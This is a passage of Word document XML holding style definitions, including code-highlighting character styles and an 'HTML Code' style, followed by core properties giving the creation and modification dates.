    <w:rsid w:val="00C82712"/>
    <w:rsid w:val="00D40CA0"/>
    <w:rsid w:val="00E942B6"/>
    <w:rsid w:val="00EB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1C9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C02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4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2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0254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025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549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57159B"/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159B"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-v">
    <w:name w:val="crayon-v"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0057159B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-sy">
    <w:name w:val="crayon-sy"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0057159B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-h">
    <w:name w:val="crayon-h"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0057159B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-o">
    <w:name w:val="crayon-o"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0057159B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-i">
    <w:name w:val="crayon-i"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0057159B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-cn">
    <w:name w:val="crayon-cn"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="0057159B"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007431C9"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="007431C9"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="B6DDE8" w:themeFill="accent5" w:themeFillTint="66"/>
      <w:spacing w:line="240" w:lineRule="exact"/>
      <w:jc w:val="both"/>
    </w:pPr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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-26T01:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-12T10:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>